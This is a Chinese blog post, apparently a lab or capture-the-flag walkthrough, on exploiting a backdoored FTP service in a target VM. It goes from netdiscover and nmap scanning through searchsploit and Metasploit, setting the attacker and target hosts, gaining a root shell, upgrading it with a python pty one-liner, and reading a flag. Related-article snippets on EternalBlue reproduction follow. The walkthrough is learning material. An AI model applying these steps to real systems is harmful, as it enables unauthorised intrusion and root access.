FTP信息后门利用

已于 2022-05-06 14:04:32 修改
阅读量278 收藏
点赞数 3
文章标签: linux 安全
于 2022-05-06 11:42:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_67986174/article/details/124606492
版权

查看本机IP地址

利用netdiscover命令扫描靶机ip

netdiscover -r [扫描的网段]/网络位

通过nmap工具扫描靶机开放的端口

使用searchsploit来查看对应的版本该服务有没有可利用的漏洞

使用Metasploit进行溢出(用msfconsole打开), 使用search 版本号搜索是否有对应的漏洞命令模块

 查看payloads

 设置相关参数

 设置攻击机ip,靶机ip 显示信息

set rhost 靶机ip
set rport 靶机端口号
set lhost 攻击机ip
set lport 攻击机端口号

 执行远程溢出命令

使用id查看当前用户所得到的权限,直接获得所得到的root权限

优化shell ,使用python -c “import pty;pty.spawn(‘/bin/bash’)” 

 进入root目录寻找flag文件,查看全部文件

一条小兜兜o
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
迷你FTP.zip
09-26
6. **日志记录**:ftp.log文件是FTP服务器的日志文件,记录了服务器的活动,包括登录、文件传输、错误信息等,这对于监控服务器状态和排查问题非常有用。 7. **自定义设置**:迷你FTP服务器可能提供自定义端口号、...
永恒之蓝复现
weixin_45116657的博客
08-16 747
一、实验环境: kali攻击机—IP地址:192.168.85.156 Win 2008靶机—IP地址:192.168.85.152 二、实验过程: 1、扫描靶机,查看445端口是否开放; 2、复现 2.1> 在kali中打开METASPLOIT 打开控制平台:msfconsole平台 2.2> 在msfconsole平台上搜索ms17-010相关模块; search ms17-...
MSF笔记
super_m@n的博客
12-18 363
全称:metasploit 0*01模块介绍 /usr/share/metasploit-framework/modules auxiliary用于各种辅助功能 比如:信息收集、枚举、指纹探测、扫描 encoders编码模块,对payload进行加密 evasion exploits漏洞利用脚本目录 nops维持payload稳定性 payloads post 0*02简...
ftp常用命令_ftp port命令,满满干货指导
最新发布
2401_83974370的博客
04-17 2169
在主动模式中,FTP的两个端口是相对固定的,如果命令端口是n的话,那数据端口就是n-1,也就是说默认情况下,命令端口是21,数据端口就是20,你把命令端口改成了600,那么数据端口就是599。get/recv:下载单个文件get filename [newname](filename为下载的ftp服务器上的文件名,newname为保存在本都计算机上时使用的名字,如果不指定newname,文件将以原名保存。”,比如,显示当前目录中所有扩展名为jpg的文件,可使用命令 dir *.jpg。
FTP文件传输服务
m0_50818626的博客
03-27 2631
客户端通过任意端口N(N>1024)向服务器的FTP端口(默认是21)发送连接请求,服务器接受连接,建立一条命令链路。客户端希望与FTP服务器建立上传下载的数据传输时,它首先向服务器的TCP 21端口发起一个建立连接的请求,FTP服务器接受来自客户端的请求,完成连接的建立过程,这样的连接就称为FTP控制连接。FTP服务/ftp协议,采用的是TCP的20、21号端口,20号端口用于数据传输,21号端口用于FTP连接、指令控制。FTP控制连接建立之后,即可开始传输文件,传输文件的连接称为FTP数据连接。
ms17永恒之蓝漏洞复现全过程(kali-server2003)
AmyBaby00的博客
11-12 2546
本文为学习笔记,仅限学习交流。 不得利用、从事危害国家或人民安全、荣誉和利益等活动。 请参阅《中华人民共和国网络安全法》 永恒之蓝是利用Windows操作系统445端口存在的漏洞进行传播,并具有自我复制、主动传播的特性。 基于Windows网络共享协议进行攻击传播的蠕虫恶意代码 一、测试准备: 目标机:server 2003 攻击机:kali 利用Nmap扫描IP ,查看已开启端口 发现445端口...
FTP服务
weixin_47622405的博客
10-22 2101
Linux
终极服务器后门
05-04
2. 网络级后门利用网络服务漏洞,如SSH、FTP等,创建秘密的通信通道。 3. 操作系统后门:修改操作系统核心,使得攻击者能够绕过安全机制。 4. 数据库后门:在数据库系统中设置特殊查询或触发器,为攻击者提供访问...
作真正属于自己的后门程序
01-13
1 如何使非常规后门变成exe后门,方便我们使用,这里我们用来演示的后门程序是黑客...4 得到shell后,如何上传文件,这里我们采取在对方的shell下用ftp下载的方法实现上传后门程序。 5 连接后门以及后门的基本使用方法。
信息安全技术:远程文件包含漏洞.pptx
11-01
1. 攻击后果:一旦成功利用,攻击者可以执行任意代码,可能窃取敏感数据、篡改网站内容、植入后门或者完全控制服务器。此外,这种漏洞也可能被用来传播恶意软件或者作为其他攻击的跳板。 2. 防护措施: - 对用户...
信息安全技术:使用漏洞扫描工具.pptx
11-01
4. 后门:寻找可能存在的非法后门程序,这些后门可能被黑客用来控制系统。 5. 应用服务漏洞:检测Web应用、数据库应用等服务中的漏洞。 6. 网络设备漏洞:扫描路由器、交换机等网络设备的脆弱性。 7. 拒绝服务漏洞:...
搭建FTP服务器与计算机端口介绍
djssubddbj的博客
12-27 3079
FTP(File Transfer Protocol)是一种用于在计算机网络上进行文件传输的协议。它允许用户通过客户端与服务器进行通信,从服务器下载文件或将文件上传到服务器。FTP使用客户端-服务器模型。用户使用FTP客户端软件连接到FTP服务器,并通过命令发送和接收文件。FTP客户端可以是一个独立的应用程序或集成在操作系统中。FTP使用两个不同的通道进行通信:控制通道和数据通道。控制通道用于发送命令和接收响应,而数据通道用于传输实际的文件数据。
什么是ftp主动模式和被动模式
qq_45158665的博客
11-04 3338
什么是ftp主动模式和被动模式 FTP是仅基于TCP的服务,不支持UDP。与众不同的是FTP使用2个端口,一个是数据端口和一个命令端口(也叫作控制接口)。通常来说这两个端口是20(数据端口)和21(命令端口)。但FTP工作方式的不同,数据端口并不总是20.这就是FTP主动与被动模式最大的不同之处。 主动的FTP是这样的 ​ 客户端从一个任意的非特权端口N(N>1024)连接到FTP服务器的命令端口(21)。然后客户端开始监听端口N+1,并发送FTP命令PORT N+1到FTP服务器,接着服务器会从他
FTP简介及搭建&计算机端口的介绍
2301_79278613的博客
12-28 2880
FTP就是文件传输协议。用于互联网双向传输,控制文件下载空间在服务器复制文件从本地计算机或本地上传文件复制到服务器上的空间。FTP 的目标是提高文件的共享性,提供非直接使用远程计算机,使存储介质对用户透明和可靠高效地传送数据。它能操作任何类型的文件而不需要进一步处理,就像MIME或Unicode一样。但是,FTP有着极高的延时,这意味着,从开始请求到第一次接收需求数据之间的时间,会非常长;并且不时的必须执行一些冗长的登录进程。计算机“端口”是英文port的义译,可以认为是计算机与外界通讯交流的出口。
FTP模式及端口(数据端口、命令端口)
u012886185的博客
04-25 3万+
FTP是基于TCP的高级文件协议,在传输的过程中,主要分为建立连接和数据传输两部分,响应的涉及到服务器端的命令端口和数据端口。建立连接是采用tcp的三次握手模型,对于ftp服务器来说,采用固定的21命令端口和客户端进行通信,在数据传输过程中,根据FTP传输的时候的服务端数据通信过程中选择不同数据端口,可以将ftp分为主动模式(Port)和被动模式(Pasv),这两种模式,对于客户端来说,端口没有固定性,只是在创建的时候,可以主动指定本地端口,或者是随机端口,而对于服务器来说,差异性在于采用...
DC靶机1-9
qq_60905276的博客
01-22 4667
1.DC1 首先我们不知道靶机的ip地址,我们通过
FTP服务后门利用
qq_39687353的博客
04-11 969
FTP服务后门利用 1.什么是 FTP? 是文件传输协议的简称。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。用户可以通过它把自己的PC机与世界各地所有运行FTP协议的服务器相连,访问服务器上的大量程序和信息FTP 是因特网网络上历史最悠久的网络工具,从 1971 年由 A KBHUSHAN 提出第一个 FTP 的RFC(RFC114) 至今近半个世纪来,FTP 凭借其独特的优势一直都是因特网中最重要、最广泛的服务之一。 2.searchsploit
CTF--8.FTP服务后门利用
woo233的博客
09-13 905
FTP是File Transfer Protocol(文件传输协议)的英文简称,而中文简称为“文传协议”。用于Internet上的控制文件的双向传输。同时,它也是一个应用程序(Application)。基于不同的操作系统有不同的FTP应用程序,而所有这些应用程序都遵守同一种协议以传输文件。在FTP的使用当中,用户经常遇到两个概念:"下载”(Download)和上传(Upload)。"下载"文件就是从远程主机拷贝文件至自己的计算机上,"上传"文件就是将文件从自己的计算机中拷贝至远程主机上。
什么是FTP?FTP端口号是多少?FTP的端口号能改吗?ftp的端口号20、21有何区别?ftp命令?...
热门推荐
yyt7529的专栏
05-22 4万+
什么是FTP?FTP就是文件传输协议 File Transfer Protocol 的缩写.FTP端口号是多少?21FTP的端口号能改吗?能ftp的端口号20、21有何区别?一个是数据端口,一个是控制端口,控制端口一般为21,而数据端口不一定是20,这和FTP的应用模式有关,如果是主动模式,应该为20,如果为被动模式,由服务器端和客户端协商而定FTP Port模式和

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值